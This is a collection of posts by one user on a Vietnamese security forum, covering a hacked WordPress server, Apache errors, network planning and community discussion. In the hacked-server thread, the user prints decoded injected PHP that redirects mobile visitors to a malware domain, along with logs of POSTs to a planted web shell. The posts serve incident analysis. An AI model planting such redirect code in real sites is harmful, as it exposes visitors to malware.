Messages posted by: 8BiBi8

Các ban HVA xin cho mình hỏi là việc disable chức năng javascript của trình duyệt khi duyệt web thì có còn cơ hội bị virus không?

Vì mình thấy KIS của mình vẫn báo mailware khi mình vào một vài website lạ, ví dụ: KIS báo: "http://abc.com/favicon.ico contains mailware bla bla bla"

Nếu vẫn có nguy cơ bị thì có cách nào để duyệt web an toàn không, hay chỉ phải trông chờ vào các chương trình diệt virus?

Xin cám ơn.

Do tiêu đề không đủ mà mình cũng không biết ghi sao cho rõ ý, ghi logs mình muốn nói ở đây là logs ngay cả khi url web được submit vào không hề tồn tại (tức là không thể save $_POST bằng code) ?

Giả sử 1 client cài backdoor vào web mình, xong submit thông tin của client vào url backdoor đó để backdoor chạy, mình muốn biết được là client đã submit những gì thì có cách nào hay không?

Xin cám ơn.

BiBi

chắc mình phải mở box mới thôi sallythanhson, vượt ra chủ đề rồi

quanta wrote:

Việc giám sát thư mục rồi gửi mail cảnh báo khi có file nào đó bị upload lên chỉ là biện pháp tạm thời thôi. Khi đó thì chuyện đã rồi. Điều quan trọng bạn cần tìm ra là các files này được upload lên bằng đường nào.

Bạn thử paste vào đây: http://ddecode.com/phpdecoder/ xem. Sau đó phân tích rồi tìm cách chặn.

Cám ơn bạn quanta đã có lời khuyên.

Decode đoạn đầu mã hoá của file stat6jcp.php:
Code:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

với link http://mobile-mobi.info bị KIS của mình báo là có mailware (mình dùng Chrome với add-on NoScript nên cũng mạo hiểm vào xem mobile-mobi.info là cái gì nhưng KIS đã chặn).

Mình có xem file log, với 1 đoạn được trích lại như sau:

Code:

95.117.81.127 - - [07/Mar/2013:11:19:18 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
109.28.217.142 - - [07/Mar/2013:11:20:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.90.37.157 - - [07/Mar/2013:11:20:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.79.201.124 - - [07/Mar/2013:11:21:09 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
2.39.20.133 - - [07/Mar/2013:11:21:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
188.76.173.75 - - [07/Mar/2013:11:22:43 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
158.181.185.91 - - [07/Mar/2013:11:23:01 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:23:07 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.129.188.95 - - [07/Mar/2013:11:23:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:25:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:25:56 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.35.90.225 - - [07/Mar/2013:11:26:50 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.191.63.4 - - [07/Mar/2013:11:27:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.186.121.125 - - [07/Mar/2013:11:27:24 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:27:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
95.117.81.127 - - [07/Mar/2013:11:27:59 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:28:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.172.68.80 - - [07/Mar/2013:11:29:03 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.168.130.93 - - [07/Mar/2013:11:29:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:29:25 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
99.9.152.6 - - [07/Mar/2013:11:31:11 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:31:15 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.202.224.207 - - [07/Mar/2013:11:31:39 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.205.78.141 - - [07/Mar/2013:11:32:26 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.61.157.227 - - [07/Mar/2013:11:32:52 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:34:04 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.77.79.174 - - [07/Mar/2013:11:34:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.214.15.66 - - [07/Mar/2013:11:35:51 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.html HTTP/1.1" 200 2064 "<web người dùng bình thường>" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.swf HTTP/1.1" 200 1076366 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
118.69.197.136 - - [07/Mar/2013:11:36:41 +0700] "POST /wp-cron.php?doing_wp_cron=1362631001.1471779346466064453125 HTTP/1.0" 200 - "-" "WordPress/3.4.2; web người dùng bình thường"
180.93.240.44 - - [07/Mar/2013:11:36:40 +0700] "GET /?p=27&lang=en HTTP/1.1" 200 14697 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.5.0 HTTP/1.1" 200 175 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/style.css HTTP/1.1" 200 15660 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcrollstyles.css HTTP/1.1" 200 1316 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcroll.js HTTP/1.1" 200 15019 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/mootools-1.2-more.js HTTP/1.1" 200 18934 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"

Có vẻ như các ip cứ truy cập vào file hack đều đều từng giây một và đổi ip liên tục (chắc là muốn vượt firewall), minh nghĩ chắc là ai đó đã hack web của mình bằng các plugin chưa được cập nhật, chỉ có 2 thư mục wp-content/plugins và wp-content/themes trên web có quyền write và cả 2 đều chứa file hack. Nhưng mình vẫn không hiểu là việc cứ 1s request vào "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" để làm gì nữa?

Mình đã mv toàn bộ thư mục web sang chỗ khác và chown nó sang root, xong svn lại toàn bộ web (svn cho lẹ, đỡ phải tìm từng file hack rồi xoá, hic ).

p/s: bạn quanta cho mình hỏi là có cách nào block các request này không theo như logs mình có copy ở trên

Cám ơn bạn quanta, và tarzanvip

kakarottbatdong wrote:

Những file bồ đưa là những con shell php. dùng để xem thông tin php.ini và các file trên host của bồ, bồ nên tìm thêm và xoá đi, sau đó cố gắng tìm các lỗi để fix

thanks bạn,

Bạn biết cách nào để giới hạn một process httpd không dùng nhiều % CPU đã định trước không?
Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux giúp mình khoá một thư mục tuỳ chọn, nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không?

Sáng nay mình vào cty thì nghe mọi người cty bảo là web vào không được, thử ssh thì thấy CPU server 100%, top 1 phát thì có khoảng 1 chục request cpu 40 - 60% httpd, xem log http thì thấy client đang request vào các đường dẫn file chưa từng tồn tại trong thư mục web, file mình upload lên mediafire:

Code:

http://www.mediafire.com/?7r6hi8e38rxhm8e

1. Toàn bộ đều là file php, nhưng code đã bị mã hoá, mình không rành vụ mã hoá này, mong được các bạn HVA phân tích giúp là "kẻ lạ mặt" đã và đang làm gì?.

2. Hiện tại mình tạm thời tắt quyền write thư mục, file. serve đã ổn, mình có biết chút ít về code php, đọc sơ qua các file thì hình như là "kẻ lạ mặt" đang submit POST lên server mình và get thông tin server, mình không hiểu là vì sao một vài cú POST httpd như vậy mà lại chiếm quá nhiều % CPU như thế, xin được trợ giúp cách khắc phục.

Xin cám ơn.

andrewsvu wrote:

MÌnh đã kiểm tra:

- Firewall của router (DIR-655)
- Tắt iptables
- Tắt firewall của máy chủ windows 2008 chạy dữ liệu kế toán
- trong khi chờ đợi mình đã Cài thử chạy Apache hoặc NGINX vào 01 máy tính bàn khác thì chạy ok

Thật không biết cách giải quyết sao cho được nên mong anh quanta và các bạn trong hvaonline giúp đỡ.

Mình thấy cách hay nhất là bạn cài thằng teamviewer vào, nhờ AE nào ở HVA hay ai rành IT connect vào kiểm tra, khoảng vài phút là biết nguyên nhân với một người có kinh nghiệm, hỏi qua hỏi lại vầy mất thời gian của 2 bên rất nhiều, sửa xong thì post lên đây để người sau tham khảo, thế là xong.

Log của apache và nginx nữa bạn, nếu có thể thì iptables luôn

Ky0shir0 wrote:

Có thể học hỏi được gì về "thử nghiệm Hacking & Security cơ bản" từ cái môi trường này nhỉ?

Tiêu đề chính xác của người ta là : " Thiết lập môi trường thử nghiệm Hacking & Security cơ bản", người ta đã hướng dẫn step by step cách thiết lập cho cậu rồi còn đòi hỏi gì nữa. Cậu lại đi cắt cụt mất mấy chữ đầu rồi hỏi một câu theo kiểu "thọt gậy bánh xe", bàn luận để giúp người đọc thêm kiến thức chứ không nên chỉ thể hiện cái tôi "có vẻ hiểu biết" của cậu. Mình chúa ghét cái kiểu cắt cụt câu nói của người ta rồi suy ra nghĩa khác như vầy, như mấy thằng cha nhà báo, phỏng vấn người ta xong cắt từ đi là thành ra ý khác liền, chắc cậu sẽ không giống vậy đâu hen và hi vọng sẽ có những comment "dễ đọc và dễ chịu" hơn sau này từ cậu.

p/s: với bài viết như vầy thì còn rất nhiều member chưa biết, ít nhất là với mình, bạn xnohat cứ viết tiếp nhé, thanks.

Thân.

theo mình thì bạn nên:
+ cài lại window mới
+ download Kaspersky về cài
+ tắt bỏ chức năng lưu tin tự động của yahoo chat, trong message archive ấy. Người ta đọc trộm không nhất thiết là phải đọc từ máy PC hay ĐT của bạn, mà có thể đọc log lưu tự động của FB, yahoo, gmail, ...
+ không click vào bất cứ link bậy bạ nào mà bạn chưa biết chắc nó là link web gì. Ví dụ: gmail.com, yahoo.com thì click, còn http://abc.com/yahoo/login, .. thì chửi cái thằng gửi liền.
+ không xài wifi công cộng, hoặc wifi mà bạn không phải là admin, ví dụ: wifi nhà riêng có mình bạn thì oke, wifi công ty thì khỏi vào.

Và giải pháp cuối là ... nên nhờ 1 thằng bạn rành IT thân và tin tưởng một chút kêu nó kiểm tra máy hoặc cài lại máy giùm là xong, thế thôi.

conmale wrote:

Đừng thức khuya và thức dậy trễ vì não bộ làm việc tốt nhất vào buổi sáng sớm.

Về việc phân chia thời gian thì cũng tuỳ thuộc vào sức khoẻ và hoàn cảnh của từng người, với mình thì mình thường ngủ lúc 12h, những lúc hăng máu việc chưa xong thì quấc luôn đêm, thế là sáng hôm sau vật vờ cả buổi sáng, hic smilie

. Theo các anh thì không nên ngủ quá mấy giờ và thức quá mấy giờ?

Ví dụ: nên thức không quá 2h khuya và nên dậy sớm lúc 6h30 sáng chẳng hạn.

Theo mình thì các bạn làm IT thức rất khuya, và đôi lúc ... dậy muộn, tất yếu sẽ gây ra nhiều phản ứng phụ về thể chất và tinh thần.
Vậy theo mọi người ở diễn đàn ở HVA mình thì để kham tốt công việc ở công ty cũng như ngày càng gia tăng nội công thâm hậu trong các lĩnh vực về IT thì chúng ta nên sắp xếp thời gian như thế nào là hợp lý (tuơng đối)?

1. Khi còn là Sinh viên.
2. Khi đã đi làm.
3. Khi đã đi làm và có 1 mái ấm be bé ^^ (như anh Con Ma Le chẳng hạn, hì).

Rất mong nhận được sự góp ý, trao đổi sôi nổi của mọi người.

Mình đã tìm ra lỗi, do thằng Suhosin PHP, hic,

suhosin.request.max_varname_length
suhosin.get.max_name_length

Thanks mọi người đã ghé thăm

Hic, ai giúp mình với, hỏi Google muốn khờ luôn mà không giải quyết được

Chào mọi người,

Hiện tại mình cài đặt Apache thì web chạy bình thường nhưng khi request với một url dài thì bị lỗi:

Code:

example.com/congtrinhs/list_all_congtrinh/tieude:test/tinhthanh:/vitri:/cdt_name:/congtythuchien_id:/nhom:/hangmuc:/type:/tilephantramxong:/co_hd:/ngayky_from:/ngayky_to:

nếu url request ngắn ngắn như: Code:

example.com/congtrinhs/list_all_congtrinh/tieude:test

thì web chạy bình thường

Logs apache sau khi restart lên và run url ở trên:
Code:

[Sun Aug 12 12:38:19 2012] [notice] caught SIGTERM, shutting down
[Sun Aug 12 12:38:19 2012] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sun Aug 12 12:38:19 2012] [notice] Digest: generating secret for digest authentication ...
[Sun Aug 12 12:38:19 2012] [notice] Digest: done
[Sun Aug 12 12:38:19 2012] [notice] Apache/2.2.3 (CentOS) configured -- resuming normal operations
[Sun Aug 12 12:38:21 2012] [notice] child pid 25378 exit signal Segmentation fault (11)
[Sun Aug 12 12:38:21 2012] [notice] child pid 25379 exit signal Segmentation fault (11)
[Sun Aug 12 12:38:22 2012] [notice] child pid 25380 exit signal Segmentation fault (11)
[Sun Aug 12 12:38:22 2012] [notice] child pid 25381 exit signal Segmentation fault (11)

php -v
Code:

PHP 5.4.5 (cli) (built: Jul 20 2012 09:52:56)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
with Suhosin v0.9.34-dev, Copyright (c) 2007-2012, by SektionEins GmbH

httpd -v
Code:

Server version: Apache/2.2.3
Server built: Jun 6 2012 10:00:36

Mình không biết lỗi trên là do bị gì, mong được mọi người giúp đỡ. Xin cám ơn.

Mình cám ơn mọi người đã góp ý.

neverwon wrote:

Với mô hình này, bạn cần:
- 4 cổng mạng gắn trên server Kerio (01 cổng kết nối với router Praytek, 3 cổng dành cho 03 mạng LANs)
- Tối thiểu 03 switch cho 03 mạng LAN (mạng 1.x cần tối thiểu switch 16 ports. 2.x và 3.x, mỗi LAN cần ít nhất 1 switch 24 ports) - Với cấu hình switch tối thiểu như thế này, bạn gần như không thể mở rộng mạng!!!
- Nếu muốn mở rộng, nếu cần có thêm LAN mới, bạn cần tăng số cổng mạng trên server và tăng số switch. (Với switch 24 ports loại thường, bạn chỉ có 23 ports để phục vụ users).
Note: Thay vì tăng card mạng trên server, bạn có thể trang bị router hoặc switch layer 3 (tự bạn tham khảo và cân nhắc về giá cả).

Với cấu hình của server Kerio này, về cơ bản là đủ để bạn mở rộng. http://www.kerio.com/control/technical-specifications

- Cám ơn bạn đã trả lời, cái mô hình mạng ở trên là mô hình đã triển khai, các switch đều đã đầy đủ. Do lâu lâu mạng chập chờn, chậm (đường truyền hiện tại là cáp quang FPT + 1 cáp đồng dự phòng), nên các IT bên mình đề xuất mua switch layer 3 và thay firewall phần cứng. Mình thì không rành bên kỹ thuật mạng lắm, cộng với thời buổi kinh tế khó khăn, nên mình rất phân vân trong việc duyệt mua phần cứng.
- Vì thế nên mình muốn nhờ các bạn tư vấn giúp với mô hình tổng số máy tính như trên hình thì cấu trúc mạng như vậy có ổn hay không? Vì lẽ chi phí phải đi đôi với nhu cầu (ở đây là khoảng 50 người, dư tính tăng lên khoảng 80 trong 1 -> 2 năm) sao cho thật hợp lý.

ở trên là sơ đồ mạng mà IT mạng đã vẽ lại cho mình, các Switch Layer 2, các đường mạng 1.x , 2.x , 3.x được chia cho các phòng ban riêng biệt.

Con server ở vị trí số <1> làm firewall cho toàn bộ hệ thống và đảm nhận thêm một số thứ mà trong hình có liệt kê bên dưới. Trong đường mạng 1 chấm có tới 15 máy là các máy của IT admin và một số máy đặc biệt khác.

Do mình kiến thức hạn hẹp nên nếu có nói gì không đúng mong các bạn, các anh/chị thứ lỗi. Mình muốn hỏi con Kerio đứng chịu trận toàn bộ vậy có ổn không? Nếu đổi sang hướng Linux thì cần phải làm mô hình như thế nào? Và nếu các bạn, anh/chị là system admin cho hệ thống mạng thì các bạn, anh/chị sẽ thiết kế như thế nào để đảm bảo user có tăng lên khoảng 80 người hệ thống vẫn chạy ổn.

Cám ơn,

BiBi

Mình thấy topic phần lớn ai vào thảo luận đều có ý tốt cả, không ai muốn làm việc xấu (ở đây là tạo virus) đáng mừng là thế.
Ở đây tranh luận chủ yếu xoay quanh câu nói: "tui không viết virus làm sao tui chặn được virus?", câu này viết chính xác chút thì đã không còn tranh luận rồi, đơn giản là: "tui biết cách viết virus nhưng tui không cần phải viết ra virus, tui vẫn có thể diệt được virus dễ dàng".

quanta wrote:

Cho mình hỏi lương bạn giờ bao nhiêu vậy ?

mình có ghi "không biết chính sách đã đổi chưa" ở trên mà, còn lương thì là cả hỏi lẫn trả lời đều không nên.

quanta wrote:

Chào mọi người,

Chỗ mình cần tuyển 2-3 bạn quản trị hệ thống (không yêu cầu kinh nghiệm, miễn là bạn chứng minh được kiến thức của mình).

Yêu cầu chung như sau:
- Nắm vững TCP/IP
- Tối ưu LAMP
- Sử dụng các công cụ monitor như: Ganglia, Nagios, Cacti, ...
- Có kiến thức về bảo mật
- Có khả năng triển khai IDS, IPS
- Thành thạo Shell script, biết thêm Python, Perl, ... là một lợi thế
- Đã từng recompile kernel
- Hiểu rõ LDAP, biết cách tích hợp với các dịch vụ khác
- Hiểu biết về NoSQL databases
- ...
- Đọc viết tiếng Anh tốt, có kỹ năng giải quyết vấn đề, kỹ năng viết tài liệu, ...

Mức lương: khoảng 8 triệu cho một người có 2 năm kinh nghiệm.

Bạn nào có hứng thú thì gửi CV vào tonganhquan [dot] net [at] gmail [dot] com cho mình nhé. Cảm ơn.

biết nhiêu đây mà luơng có 8tr sao trùi, hic. Làm IT sao cuộc sống bèo quá vậy không biết, mình đi làm cũng được mất năm, không phải là đứng núi này trông núi nọ, nhưng thực sự các ngành khác đòi hỏi trí óc ít hơn IT mà luơng lại khá hơn nhiều.

p/s: không biết chính sách đã đổi chưa, chứ vào học hỏi thì oki, còn vào mà làm có 8tr thì ...

estendius wrote:

Nhiều lúc nói nhẹ và "xã giao, lịch sự" cũng chưa chắc là cách giải quyết vấn đề tốt đâu. Cứ phải dùng "biện pháp mạnh"

Hi, câu của bạn hơi khó đọc, vắn tắt quá để mình viết lại cho nó đẹp:
Nhiều lúc nói nhẹ và "xã giao, lịch sự" cũng chưa chắc là cách giải quyết vấn đề tốt đâu. Nhưng "xã giao, lịch sự" trong sự khôn khéo, sâu sắc, uyển chuyển thì vẫn hơn là "Cứ phải dùng "biện pháp mạnh""

Mình đọc rất nhiều topic ở HVA, mình học được nhiều thứ, từ kỹ thuật đến các kỹ năng nói chuyện, cách trả lời comment từ tất cả mọi người và nhất là các anh admin, BQT HVA. Nhưng qua loạt bài của bạn Doremon, mình thấy cần phải có chút góp ý nhỏ, đó là các bạn dùng từ quá nặng nề để nói chuyện với nhau, theo bản chất con người, dù cho các bạn nói đúng nhưng cách các bạn nói không hợp lý thì người nghe cũng tất yếu sẽ không thèm nghe. Như bạn tmd dùng những lời lẽ chỉ trích rất nặng, còn bạn comale thì cứ lặp đi lặp lại mấy từ "chụp mũ" rồi "ngụy biện" (có thể với bạn là bình thường, nhưng những người khác như mình chẳng hạn rất khó chịu, huốn chi là bạn Doremon). Ví dụ: các bạn có thể nói "cách của bạn Doremon cũng rất hay nhưng mình thấy còn nhiều chỗ chưa hợp lý (theo kinh nghiệm thực tiễn của mình) là abc, xyz, ..." thì topic đã có kết quả khác. Mình rất ngưỡng mộ kiến thức (cả kỹ thuật lẫn cách sống cách nghĩ) của anh comale, nhưng cũng rất thất vọng trước cách cư xử của anh conmale (người có quyền lực tối cao nhất diễn dàn) trong topic này, lại để kết cục chủ để là "học Tiếng Anh" trở thành nơi đấu khẩu về kiến thức, thậm chí là chà đạp nặng nề sự "chia sẻ không vụ lợi" của người khác, kết quả chỉ là sự bất bình và tâm trạng không vui cho người khác, mình thấy không đáng chút nào cả, chắc bạn comale cũng không muốn đúng không?

"Lời nói không mất tiền mua, lựa lời mà nói cho vừa lòng nhau.".

Các bạn có thể đọc bài viết phỏng vấn thiền sư Nhất Hạnh, người bị lưu đày 39 năm vì kêu gọi hòa bình ở VN:
http://langmai.org/cong-tam-quan/Thich-Nhat-Hanh/oprah-dam-dao-voi-thien-su-nhat-hanh

Mình xin trích một đoạn từ bài viết trên:

TS Nhất Hạnh: Lắng nghe sâu là lắng nghe như thế nào mà làm vơi được khổ đau của người khác. Ta có thể gọi đó là cách lắng nghe bằng tâm từ bi. Ta lắng nghe chỉ với một mục đích duy nhất : giúp cho ngươi kia trút hết nỗi lòng. Dù rằng có khi người kia đã nói những điều dẫy đầy những cái thấy rất sai lạc, đầy cay đắng, nhưng ta vẫn có thể tiếp tục ngồi lắng nghe với tâm từ bi. Bời vì ta biết rõ là lắng nghe như thế sẽ cho người kia một dịp may là bớt khổ. Nếu bạn muốn tìm cách sửa cái thấy sai lạc của người kia, ta phải chờ một dịp khác. Nhưng bây giờ đang ngồi nghe, bạn không nên cướp lời người đó, cũng không nên lý luận gì hết. Nếu bạn cướp lời thì người kia sẽ cụt hứng, sẽ mất dịp may được trút bầu tâm sự. Bạn chỉ cần lắng nghe với tấm lòng thật từ bi và điều đó sẽ giúp cho người kia bớt khổ nhiều lắm. Chỉ cần ngồi lắng nghe được chừng một giờ như thế thì ta có thể giúp chuyển hoá và chữa lành khá nhiều.

Cô Oprah: Tôi thích cách lắng nghe sâu này lắm bởi vì khi người bạn tới với ta và muốn ta lắng nghe nỗi khổ của người ấy, ta hay bị kéo đi bởi ý muốn góp ý khuyên can này nọ. Nhưng nếu ta để cho người kia trút được hết nỗi lòng. Rồi một thời gian khác ta mới trở lại khuyên nhủ và góp ý thì người kia có dịp chữa lành sâu sắc hơn. Có phải thầy muốn nói như vậy không ?

TS Nhất Hạnh: Thưa đúng. Lắng nghe sâu giúp ta nhận diện những cái thấy sai lầm của người kia về chính họ và cả những cái thấy phiến diện của họ về ta. Người kia có cái thấy sai lầm về chính anh hay chị ta và về chúng ta. Và chúng ta thì cũng có tri giác sai lầm về chính ta và về người đó. Đó là căn nguyên của bạo động, bất hòa và chiến tranh. Các người khủng bố, họ có cái thấy sai lệch. Họ tin là nhóm người kia (chống khủng bố) đang muốn tiêu diệt tôn giáo họ, tiêu diệt nền văn minh của họ. Vì thế họ phải tiêu diệt ta trước, trước khi ta tiêu diệt họ. Rồi những người chống khủng bố cũng nghĩ và hành xử y chang như nhóm kia : tụi nó muốn tiêu diệt ta thì ta phải tiêu diệt họ trước. Cả hai bên đều bị kích động bởi sự sợ hãi, căm thù và tri giác sai lầm. Và tri giác sai lầm, cái thấy sai không thể chữa trị bằng đạn bom. Cái thấy sai chỉ có thể chữa trị bằng lắng nghe sâu, nghe với tâm từ bi và lời nói ái ngữ, để gỡ từ từ những cái thấy sai lệch đó mà thôi

Tại sao khổ đau quan trọng thế và làm sao để chữa lành nó?

Cô Oprah: Cách duy nhất để chấm dứt chiến tranh là sự truyền thông của các bên.

TS Nhất Hạnh: Vâng, chúng ta phải có khả năng nói rằng: “Này các bạn, này các bạn thân mến, tôi biết quý vị đang khổ, tôi không hiểu hết được những khó khăn và khổ đau của quý vị. Chúng tôi không có ý đồ làm khổ quý vị. Ngược lại chúng tôi không hề muốn làm cho quý vị khổ thêm nữa. Nhưng chúng tôi không biết làm cách nào và chúng tôi e sẽ làm thêm những điều sai trái để khiến cho quý vị khổ thêm nếu quý vị không giúp chúng tôi hiểu thêm quý vị. Vì thế xin quý vị cho chúng biết những khó khăn của quý vị, chúng tôi rất mong được học thêm, được hiểu thêm”. Chúng ta phải tập nói lời ái ngữ. Và nếu thật sự chúng ta nói những lời ấy bằng tấm lòng chân thật của ta thi họ sẽ mở lòng ra. Rồi thì ta thực tập lắng nghe với tâm từ bi và nhờ thế ta sẽ học thêm được biết bao điều về cái thấy (chưa đúng đắn) của ta và cái thấy (chưa đúng đắn) của họ. Chỉ có những dịp như thế ta mới lấy ra từ từ những cái thấy sai lầm. Đó là cách hay nhất, cách duy nhất để làm vơi đi nạn khủng bố.

p/s: mình cũng là dân IT cùi, nên không đóng góp gì kỹ thuật được, reg nick mới cũng chỉ để góp ý mong chúng ta hòa đồng, vui vẻ vì một cộng đồng VN giàu đẹp.